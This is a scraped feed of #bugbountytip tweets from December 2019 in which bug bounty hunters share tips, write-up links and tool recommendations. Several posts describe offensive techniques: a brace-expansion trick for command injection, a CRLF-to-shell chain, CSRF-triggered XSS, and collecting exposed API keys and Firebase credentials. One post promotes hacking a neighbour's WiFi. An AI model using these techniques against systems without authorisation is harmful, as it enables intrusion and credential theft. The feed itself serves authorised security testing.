4 6000 hackerone disclosed reports at one place. https://t.co/bxvXpnVitp #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #itsecurity #websecurity #appsec #hacker #security #Hackers #Android #Androidhacking #bugbountytips #bugbountytip #hackerone
Vishnu Vardhan Gadupudi
@vishu10x00


2019-12-11 20:11:29
0 @idontkn85445458 @Dondata4 - As this is a post based you need to create a html csrf to trigger xss. - Just use burpsuite CSRF generator. - Save it as .html file. - Open the .html file it triggers XSS🎉 #bugbountytip
Sunil
@Sunilkande1137


2019-12-11 19:13:07
3 6000 hackerone disclosed reports at one place. https://t.co/bxvXpnVitp #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #itsecurity #websecurity #appsec #hacker #security #Hackers #Android #Androidhacking #bugbountytips #bugbountytip #hackerone
bug bounty tips - Retweet
@BugbountytipsR


2019-12-11 14:18:36
0 Use this link https://t.co/MWpV7kbFdO #bugbountytip #bugbountytips https://t.co/2suoUC9DK3
Tragger Osbourne
@OsbourneTragger


2019-12-11 13:52:31
0 We all know @bishopfox is a team full of slayers. Be sure to check out their latest write up where they identified 9 vulnerabilities in the Solishmed app #bugbounty #bugbountytip #bugbountytips #infosec #redteam #osint https://t.co/sNVecQJVRj
Vishnu Vardhan Gadupudi
@vishu10x00


2019-12-11 13:39:36
0 Escalate CRLF to RCE, I got this chain in my dreams⛷️, i think it won't, at least not very often :P #bugbountytip CRLF -> X-HTTP-Method-overide:PUT -> Shell
bug bounty tips - Retweet
@BugbountytipsR


2019-12-11 12:56:47
1 XSS is like evil God who is everywhere Xss Hunter @AnasIsHere Xss Like Pro at https://t.co/a47iwf9j9f #bugbountytips #bugbounty #bugbountytip #hacking #writeup #xss
ghostlulz
@ghostlulz1337


2019-12-11 12:46:24
3 Everyone knows @bishopfox is a team full of slayers. Be sure to check out their latest write up where they identified 9 vulnerabilities in the Solishmed application. https://t.co/OtxduAPoSM #bugbounty #bugbountytip #bugbountytips #infosec #redteam #osint
D Ξ Ξ P Λ K ⚙️
@Deepak_maxx


2019-12-11 12:43:40
0 If you got 10 stored XSS on the same application! How would you report it and why? I'm sure everyone will have their own opinions & experiences regarding this! #bugbounty #bugbountytips #bugbountytip
ZracheSs-AnasZ
@ZrariAnas


2019-12-11 08:12:03
0 If you didn’t already subscribe to @spaceraccoonsec blog posts! Go now, do it.. Come on, don’t question reason, just do it. Trust me, you’ll like it. I love you and you love me, then go do it. Subscribe, it’s free... No reason not to. Stop reading already!!??? #bugbountytip https://t.co/A7MeCBTLaA https://t.co/IGbatoBAAM
bug bounty tips - Retweet
@BugbountytipsR


2019-12-11 03:59:08
0 Beginners miss to chk source code for XSS and they never find out that it is easy #easy #bugbountytip #bugbountytips #hacking https://t.co/QM6gs3Ijpi
Sajjad Arshad
@sajjadium


2019-12-11 03:34:14
0 @USENIXSecurity @fransrosen @dawidczagan @orange_8361 @irsdl @garethheyes @NahamSec @ldionmarcil @nj_dav @jobertabma check out new ways of exploiting #WebCacheDeception using #PathConfusion techniques! #togetherwehitharder #bugbounty #bugbountytip #bugbountytips @Hacker0x01 @TheHackersNews
Ammar Amer🇸🇾
@cry__pto


2019-12-10 17:34:59
5 -List of some Penetration Testing Tools.pdf: https://t.co/sN2lkjt1Uh -In Plain Sight:1: Vulnhub Walkthrough.pdf: https://t.co/F2zf4eJK6n -A cheat-sheet for password crackers.pdf https://t.co/XQQxCJ99wQ #bugbountytip #redteam #PenTest #Hacking #cybersecurity #BugBounty #OSINT
Mourad
@SecuAudit


2019-12-10 15:56:36
0 i reported a critical bug in a 3rd party website company confirmed that this is critical even if is out of scope ,HackerOne Staff despite this insists that this is not critical and updated the severity from Critical to Medium #750138 #BugBounty #bugbountytip @Hacker0x01 ๐Ÿ˜Ÿ
0day work
@0daywork


2019-12-10 15:53:28
1 #Bugbountytip Look for #API keys in the documentation or screenshots of blog posts. Sometimes those are *not* (entirely) redacted and still valid employee's credentials, giving you access to some juicy endpoints ;-) #Bugbounty #OWASP #ITSecurity https://t.co/V91tslWu3Y
Skyper 💻
@SkypLabs


2019-12-10 00:33:05
2 Get the #ASN of a company: https://t.co/pi8II54BuN #Security #Hacking #BugBounty #BugBountyTip #BugBountyTips #Shodan
Alessandro Brucato
@_brucedh


2019-12-09 17:17:36
0 Any idea how to trigger an XSS into the body of a 301 redirect? @s0md3v @uraniumhacker @iamnoooob @brutelogic #bugbountytip https://t.co/dmW1q4hwTv
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-09 16:21:04
4 ๐Ÿ†๐Ÿ†Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/4iR3cX3qyf
intigriti
@intigriti


2019-12-09 13:08:32
12 Did you know you can use OpenSSL for recon purposes? 🔒 Thanks for the #BugBountyTip, @michael1026h1! https://t.co/mRraH8cK2z
Mohammed Shine
@MohammedShine8


2019-12-09 11:44:16
6 Got stuck with spaces in command Injection? Use {} to eliminate spaces while using commands. Eg: {ping,127.0.0.1} {ip,addr} {ls,-al} #bugbounty #bugbountytip #infosec #commandinjection #cmdi #vapt #hacker
dark_warlord14
@dark_warlord14


2019-12-09 11:42:17
1 Opened a web page on Firefox and left to get coffee. Came back in a minute to find that sweet XSS popup by @knoxss_me just lying there. @brutelogic will amaze you every time. #bugbountytip Try @knoxss_me and save time looking for XSS manually. https://t.co/4ppKTLDCeN
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-09 08:47:33
0 💰Keep Following Us 💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil #certification #hackerone https://t.co/DwvuqYv30k
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-09 08:43:54
0 True Story When Hacking the Neighbourhood WiFi — Tutorial Coming Soon 💰💰 Keep Following Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops https://t.co/P5VyKxUU81
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-09 08:41:28
0 HOF Coming Soon ! Keep Following ! Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil https://t.co/3GBqgjOgP4
robre
@_robre


2019-12-09 00:43:25
0 Create your own wordlists and be creative with them. If you’re just using seclists like everyone else, you will only find what everyone else is finding. #bugbountytip #bugbountytips
Rafin Rahman Chy
@rafinrahmanchy


2019-12-08 18:15:45
3 Information Gathering Methodologies *Social Engineering *Doxing *OSINT *Advanced Google Search/Google Hacking *DNS Enumeration *Internet Archive *Dumpster Diving #CyberSecurity #InfoSec #EthicalHacking #EthicalHacker #Hacking #Hacker #Pentesting #Recon #BugBounty #bugbountytip https://t.co/bVcvwskY8a
Tragger Osbourne
@OsbourneTragger


2019-12-08 15:06:59
0 firebase database It’s one of the easier win for #BugBoundy you can easily look for it on google using Site:.firebaseio.com/.json but google doesn’t give you results but if use bing you can get results Google knows the problem #togetherwehitharder #BugBounty #bugbountytip https://t.co/fMSc8J6lM1
Rafin Rahman Chy
@rafinrahmanchy


2019-12-08 15:01:12
11 The best guideline to become an Ethical Hacker I've ever read https://t.co/BMrOc4hH51 #CyberSecurity #InfoSec #infosecjobs #InfoSecurity #ITSecurity #EthicalHacking #EthicalHacker #Hacking #Hacker #Hackers #WhiteHat #BugBounty #bugbountytip #bugbountytips #Pentesting #Pentester
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-08 10:21:34
0 Ginp - A malware patchwork borrowing from Anubis Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting https://t.co/AzgReUIeLf
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-08 10:15:48
0 Breaking Mimblewimble’s Privacy Model Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops https://t.co/5gDbIPnmFH
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-08 10:07:55
2 Free Giveaway -- Free Programming Ebooks Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops https://t.co/7kp48r2kcA
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-08 10:00:40
3 Introducing Flan Scan: Cloudflare’s Lightweight Network Vulnerability Scanner -- Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 https://t.co/OSiQlEhTHi #BugBounty #BugBountyTip #bugbountytips
Terminal Jockey
@TerminalJockey


2019-12-08 04:03:53
1 I wrote a tool to help me learn bash! Simple script to do a little dns enum then crawls results for dirs found in the robots.txt file. Will be adding functionality, open to critique! https://t.co/PmlCbFedDE #bugbounty #infosec #ctf #bugbountytips #bugbountytip
Ammar Amer🇸🇾
@cry__pto


2019-12-07 23:54:02
2 i have finished building my github repository which talk about #OSINT.a very important repository for ethical hackers and #BugBounty hunters and of course #OSINT lovers the repository for now contain 100 tips and it will get daily updates https://t.co/gNMSDGULS6 #bugbountytip
Samet ŞAHİN
@sametsahinnet


2019-12-07 18:14:21
2 Here is a blog and trick about : "Javascript File Inclusion via a Simple Link Injection" #bugbountytip : Even a Simple Link Injection can be very harmful. Depends on where it is. https://t.co/TcOpslYuvE https://t.co/ks5NJDD3ss
Zero Xyele
@zeroxyele


2019-12-07 12:28:31
0 I Got URLs https://t.co/K5qmVWfEs0 #hackerone #hacker101 #bugbounty #bugbountytips #bugbountytip #bugcrowd https://t.co/X7J2nk2dyz
xaeroborg
@xaeroborg


2019-12-07 12:09:05
0 resource #bugbountytips #bugbountytip https://t.co/kSxeWPYqWe
Hendrik
@hendrikvb


2019-12-07 07:11:49
0 #bugbountytip Add #corsy to your #CSRF recon, complement with #bolt, both by @s0md3v. #bugbounty #Pentesting
ghostlulz
@ghostlulz1337


2019-12-07 01:52:08
1 Most hunters freeze up when they get a piece of source code to analyze. Source code analysis can help you find a lot of bugs which are missed by black box style testing. Don't miss easy XSS. More info in my blog: https://t.co/Ke274Lvc9e #BugBounty #bugbountytips #bugbountytip https://t.co/E1XFw9H9Nc
ghostlulz
@ghostlulz1337


2019-12-06 20:40:05
10 If you're looking to make money bug bounty hunting you may want to get a copy of my book. Nothing is better than getting paid to do what you love! https://t.co/Z1FwTfiskG #BugBounty #bugbountytips #bugbountytip #infosec #appsec #osint #xss #pentest #redteam #cybersecurity https://t.co/CSTWdrUaD2
CyberTheReapeR☢
@CyberTheReapeR5


2019-12-06 20:39:18
1 what is xss payload for akamai waf bypass?? #hackerone #bugcrowd #infosec #bugbountytips #bugbountytip #xss #hacking
dos_kid
@kid_dos


2019-12-06 18:12:15
0 #bugbountytip Look twice before submitting reports especially for Information disclosures 😓
bugbountytip
@a_l_e_r_t_1_


2019-12-06 09:12:09
1 (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby https://t.co/amLbKREucw
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-06 06:03:58
6 Type of Cyber Attacks 🦞 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/MZpyBpq6C4
Ammar Amer🇸🇾
@cry__pto


2019-12-06 03:06:03
6 -Windows Notes + Cheatsheet.pdf: https://t.co/lVxi7uImty -Windows Privilege Escalation Fundamentals.pdf: https://t.co/raueoqhVVH -Linux Notes + Cheatsheet.pdf: https://t.co/rrdCBWkbOT -Docker for Pentesters.pdf: https://t.co/Wl6qXHe6XI #bugbountytip #redteam #PenTest #Hacking
bayani elogada
@metamudkip


2019-12-06 02:14:16
0 If you're discouraged from joining unrewarding bug bounty programs, listen to @JessieJ: "We're paying with love tonight." #bugbounty #bugbountytip
fadetoblack
@hardweired


2019-12-05 19:59:55
0 If you're Testing for SSRF or blind XXE and it should takes time to be executed or Invalidated redirections to steal tokens : https://t.co/uHMg4rJD69 This tool is awesome to Test for those kind of bugs #bugbountytips #bugbountytip https://t.co/efC5pv0SZ4
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-12-05 18:43:44
0 Is there anything more beautiful than this in bug bounty #bugbounty #bugbountytip thanks @h1_sp1d3r @hakluke @stokfredrik @Rhynorater https://t.co/z6iavoWzgc
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-12-05 16:25:09
1 #bugbountytip Detect Unix Command injection Payloads: https://t.co/Jz35dKi8KS Detect in response: regexp for burp suite. https://t.co/J0bS7ViC9C And 30 second delay. It is all.
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-05 14:17:45
0 OnePlus #Breached Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/VVsLLbfvum
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-05 14:14:39
1 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/yJGb5KrEnU
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-05 14:14:21
0 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/mzFcIOkL8E
Rafin Rahman Chy
@rafinrahmanchy


2019-12-05 13:24:00
1 Facebook Bug Bounty Blogs/WriteUps : https://t.co/CKdsEXouCz https://t.co/rzoYk67VS6 https://t.co/xeQiLCoQbM https://t.co/7y70R706W1 https://t.co/E96wwBPfc6 https://t.co/hfAsZqb9tI https://t.co/ZxPANapI5l https://t.co/SJGiC0xChE https://t.co/d57e8Seq9m #BugBounty #bugbountytip https://t.co/L02NnprDQB
Anas Mahmood 🇵🇰
@AnasIsHere


2019-12-05 12:28:29
6 #XSS like a Pro 😎 Just published another interesting writeup. Must read the full blog post Writeup: https://t.co/HlXk9esUv3 #BugBounty #BugBountyTip #Hacking #vulnerability
TvM
@tvmpt


2019-12-05 12:12:22
0 Quick and dirty way to import a big url list into burpsuite cat file | parallel -j 200 curl -L -o /dev/null {} -x 127.0.0.1:8080 -k -s #quickanddirtytip #bugbountytip #oneliner #bugbountytips
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-05 09:14:20
7 Cross Site Scripting Basics - #XSS https://t.co/0wdvBhdOHw Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-05 09:06:33
0 >> kali-undercover To Start #UNDERCOVER Mode in Kali 2019.4 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/F5IhdmmCzF
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-05 09:04:28
0 Update Your Kali and Get the Kali Undercover mode that looks like Windows OS ! Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops https://t.co/o7JrVLrhGx
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-05 09:01:35
0 PyXie Rat - Python Rat to Escalate Windows Permissions Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/eFwqj2ozDj
bugbountytip
@a_l_e_r_t_1_


2019-12-05 08:29:09
0 6 download for 50 + . GOOD HACKING !!! #bugbountytips #bugbountytip
Ajay Gautam
@evilboyajay


2019-12-05 07:06:04
4 I discovered a new kind of web application authentication bypass by accident while doing pentest and thought of sharing with you all <3 #infosecmatters #ethicalhacking #informationsecurity #cybersecurity #infosec #bugbountytip https://t.co/cFnTkaEFG2
ph0rensic
@ph0rensic


2019-12-05 01:15:20
0 I received $ 900 in a private program Hackerone! There is still time to hit the goal! I needed some arguments with the evaluator, always research what you're debating! https://t.co/TDQWkEfNMq #BugBounty #bugbountytip
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-12-05 00:30:46
0 #bugbountytip 99.99% of xss on public programs is dumpicates I got it
robre
@_robre


2019-12-04 21:06:25
1 @NathOnSecurity Hey little tip: open two windows of acunetix, double your income. #bugbountytip
@cr33pb0y
@theyiyibest


2019-12-04 20:05:09
0 Yay, I was awarded a 4 x $X00 bounty on @Hacker0x01! https://t.co/7vrkzfnbNA #TogetherWeHitHarder Recipe to this one: - Google Dorks - XSS reflected - Repeat first step. #bugbounty #bugbountyprogram #bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-04 18:58:36
0 Maximise Bug Bounty Scope - Gather Subdomains using Facebook Certificate Transparency https://t.co/AjSRBqt57p #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil #certification #hackerone
intigriti
@intigriti


2019-12-04 15:47:09
9 ⚠️Open staging environments can lead to production account takeover ✔️If they use a separate DB, but same JWT secret ✔️If the username or e-mail address is used as identifier This is an excellent #BugBountyTip, thanks @kapytein! https://t.co/yZkBoDBO1d
Tragger Osbourne
@OsbourneTragger


2019-12-04 15:24:58
0 apps,I realized after reverse engineer,using tool like apktool,I was app to look at the AndroidManifest see all permissions, which often lead to stringxml where I would find content delivery ,login ID & pass,fB tokens,googleapi, #bugbountytips #bugbountytip #togetherwehitharder https://t.co/ZBq3acOAoI
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-12-04 12:19:07
1 #bugbountytip All in one for Bug Bounty Hunters and pentesters https://t.co/lRPVHMHKAo
Ammar Amer🇸🇾
@cry__pto


2019-12-04 00:37:38
3 -Pen-testing resources.pdf: https://t.co/eykvQfDT5g -Shellcode: Encrypting traffic.pdf: https://t.co/QMsNonNYPZ -huge list of pentest tookit.pdf: https://t.co/LM0XUQb2AI -Information Gathering with theHarvester.pdf: https://t.co/ZFWOVqotm6 #bugbountytip #Hacking #osint #redteam
Tragger Osbourne
@OsbourneTragger


2019-12-03 22:31:18
0 I just find a bug 🐜 on android app Using firebase , I use apktool Then I look for AndroidManifest.xml , I found firebase they , I look for address in string.xml , I found firebase database and api keys 🔑 #bugbountytip #bugbountytips #togetherwehitharder
ᴂ
@pouyana1


2019-12-03 21:55:59
3 Of course that James Kettle articles are something else. @albinowax https://t.co/nsTQZFfzMX #bugbountytip #infosecurity #Security #websecurity
haxor_raheem
@HaxorRaheem


2019-12-03 18:31:52
1 Anyone know how to inject a "href" payload in "h1" payload . @Bugcrowd @Hacker0x01 #bugbountytip
ghostlulz
@ghostlulz1337


2019-12-03 18:26:53
9 Exposed Log Files - https://t.co/Kft6p37wJM Exposed Firebase DB - https://t.co/WGzatNLO3C Exposed Github Passwords- https://t.co/sGVY9UloQQ Hacking GraphQL - https://t.co/Z4ZBm3bN82 XSS SVG - https://t.co/5k3dGwkaGA #BugBounty #bugbountytips #bugbountytip #infosec #osint
Sebastian Wieseler
@kickino


2019-12-03 15:30:20
2 Controversial #bugbountytip Schedule meetings with (defence) vendors and learn about their technics and technologies. Engage with them during product demos and establish a deeper understanding of their products. You can also use “blue” knowledge for “red” approaches or #bugbounty
ᴂ
@pouyana1


2019-12-03 09:42:57
0 bugbounty tips : find hidden HTTP headers and inject them, simple way to reach high risk bugs. #BugBounty #bugbountytips #bugbountytip
Shaurya Sharma
@ShauryaSharma05


2019-12-03 08:39:35
0 I just finished writing a blog and it's a great read for those who are trying their luck in bug bounty "Haven’t founded any bounties yet? Hunt for these vulnerabilities in web applications for a better bounty!" https://t.co/NRSjy03JN5 #bugbounty #hacking #bugbountytip
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-12-03 08:28:35
0 #bugbountytip find open prod marathon instances in shodan. - “X-Marathon-Leader” - “ssl:Redacted” “X-Marathon-Leader”
soon
@soon73564093


2019-12-03 06:32:33
1 Bingo xss <3 #bugbounty #bugbountytip https://t.co/d6FilP9MWs
Shoeb Patel
@0xCaptainFreak


2019-12-03 04:08:04
0 I constantly take time out of App Security and learn something else to keep things interesting. System Design and Competitive programming Interests me a lot. 1. https://t.co/SpMqOJ40sE 2. https://t.co/hhWuOhB85V #bugbountytips #bugbountytip
SerWaf
@serialwaffle


2019-12-03 02:24:57
0 Can someone explain to me how the directories work in #hackerone? If I understand correctly, all of the directories are fair game (if I stick to the in-scope items of course). Can I just pick a Co. and start hunting??? #bugbounty #bugbountytip @Hacker0x01
Sanketh Sharath
@sharathsanketh


2019-12-03 02:18:19
2 Web application architecture: Principles, protocols and practices by Shklar & Rosen seems to be a great book! It's doing a world of good to me in making me understand how web apps work. Definitely recommended for those getting into bugbounty #bugbountytips #bugbounty #bugbountytip